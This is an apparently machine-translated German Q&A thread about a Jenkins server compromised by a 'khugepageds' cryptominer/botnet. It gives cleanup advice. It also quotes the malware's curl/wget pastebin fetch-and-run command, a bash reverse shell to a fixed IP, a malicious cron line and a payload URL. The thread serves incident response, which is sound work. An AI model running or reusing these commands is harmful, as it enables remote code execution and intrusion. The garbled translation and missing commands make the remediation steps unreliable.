Jenkins Hohe CPU-Auslastung Khugepageds
Also das Bild oben zeigt einen Befehl khugepageds
mit 98
zu 100
%
von CPU-Zeiten.
Ich habe versucht zu finden wie funktioniert jenkins
verwenden Sie diesen Befehl, oder was zu tun, aber war nicht erfolgreich.
Habe ich Folgendes
pkill
jenkins- service jenkins stoppen
- service jenkins starten
Wenn ich pkill
natürlich den Verbrauch nach unten geht, aber einmal neu starten Ihr wieder nach oben.
Jemand hatte dieses Problem vor?
- Wir haben dieses Problem auch. Ich habe versucht, das deaktivieren THP (khugepaged) beim Booten und zur Laufzeit gemäß dieser Anleitung access.redhat.com/solutions/46111 nach dieser Methode (askubuntu.com/a/610707/565564) für die Einstellung aktiviert und defrag, um nie und das (stackoverflow.com/a/52591781/679667) zu deaktivieren, die beim Booten in grub. Reboot. Noch sehen
khugepaged
zeigen, bis für jenkins-user und es ist mit 200% CPU 🙁
Du musst angemeldet sein, um einen Kommentar abzugeben.
So, wir haben gerade diese uns passieren. Wie pro die anderen Antworten, und einige Graben unsere eigenen, sind wir in der Lage waren, zu töten, zu verarbeiten (und halten Sie Sie getötet wurden), indem Sie den folgenden Befehl ausführen...
Stellen Sie sicher, zu ersetzen
PID_OF_khugepageds
mit der PID auf Ihrem Rechner. Es wird auch deaktivieren Sie die crontab-Eintrag. All das als einen Befehl, so dass der Prozess nicht wiederbeleben, selbst. Die Maschine wird neu starten, je den letzten Befehl.HINWEIS: Während der Befehl oben sollte den Prozess zu beenden, werden Sie wahrscheinlich wollen, um roll - /regenerieren Sie Ihre SSH-Schlüssel (auf dem Jenkins-Maschine, BitBucket/GitHub etc., und alle anderen Maschinen, dass Jenkins hatte den Zugang zu) - und vielleicht sogar spin-up eine neue Jenkins-Instanz (wenn Sie diese option haben).
Ja, wir waren auch betroffen von dieser Sicherheitsanfälligkeit, Dank pittss wir waren in der Lage zu erkennen ein bisschen mehr darüber.
Sollten Sie der /var/logs/syslogs für die curl pastebin script, das scheint zu beginnen, die mais-Prozess auf dem system, wird es versuchen, wieder eskaliert Zugriff auf Ordner /tmp und installieren Sie unerwünschte Pakete/script.
Entfernen Sie alles aus dem /tmp-Ordner, stoppen jenkins, überprüfen Sie die cron-Prozess und entfernen Sie diejenigen, die verdächtig erscheinen, starten Sie die VM.
Seit über Sicherheitsanfälligkeit fügt unerwünschte ausführbare Datei unter /tmp foler und es versucht, Zugriff auf die VM via ssh.
Diese Sicherheitsanfälligkeit auch einen cron-Prozess auf Ihrem system Vorsicht zu entfernen, sowie.
Überprüfen Sie auch die ~/.ssh Ordner für die Datei known_hosts und authorized_keys für alle verdächtigen öffentlichen ssh-Schlüssel. Die Angreifer fügen Ihren ssh-Schlüssel, um Zugang zu Ihrem system.
Hoffe, das hilft.
Dies ist ein Zusammenfluss Sicherheitsanfälligkeit https://nvd.nist.gov/vuln/detail/CVE-2019-3396 veröffentlicht am 25 Mar 2019. Es ermöglicht entfernten Angreifern zu erreichen, path traversal, remote-code-Ausführung auf einer Confluence-Server oder Data Center-Instanz per server-side-Vorlage Einspritzung.
Mögliche Lösung
Der exploit
Enthält zwei Teile: shell-Skript aus https://pastebin.com/raw/xmxHzu5P - und x86_64-Linux-binary von http://sowcar.com/t6/696/1554470365x2890174166.jpg
Das erste Skript killt alle anderen bekannten Trojaner - /Viren - /botnet-Agenten, downloads und erstellt der binäre aus /tmp/kerberods und durchläuft die /root/.ein.ssh/known_hosts versucht, verbreiten sich in der Nähe von Maschinen.
Den binären der Größe 3395072 und Datum Apr 5 16:19 ist vollgepackt mit LSD ausführbaren packer (http://lsd.dg.com). Ich habe nicht noch geprüft, was es tut. Sieht aus wie ein botnet controller.
(curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sed -e 's/\r//g'|sh
. Siehe auch diesem Artikelbash -i >& /dev/tcp/45.76.191.111/2012 0>&1
so einige menschliche intervention statt.es scheinen, wie Verletzlichkeit. versuchen Sie schauen von syslog (/var/log/syslog, nicht jenkinks log) etwa wie folgt:
CRON (jenkins) CMD ((curl -fsSL https://pastebin.com/raw/***||wget -q -O- https://pastebin.com/raw/***)|sh)
.Dass, wenn, versuchen, aufhören, jenkins, klar /tmp dir und töten alle pids begann mit jenkins-Benutzer.
Nach, wenn die cpu-Auslastung nach unten, versuchen Sie, aktualisieren Sie auf Letzte tls-version von jenkins. Weiter nach starten jenkins update alle plugins in jenkins.
Eine Lösung, die funktioniert, weil der cron-Datei wird nur neu erstellt, ist zu leer jenkins' cronfile, ich habe auch das Eigentum, und auch die Datei unveränderlich.
Dieser endlich aufhörte, diesen Prozess aus Tritte in..
In meinem Fall war dies zu machen baut nach dem Zufallsprinzip fehlschlagen mit der folgenden Fehlermeldung:
Es dauerte eine Weile, um die gebührende Aufmerksamkeit auf die Khugepageds Prozess, da jeder Ort, den ich Lesen über diese Fehler die gegebene Lösung war die Steigerung Speicher.
Problem wurde gelöst mit @HeffZilla Lösung.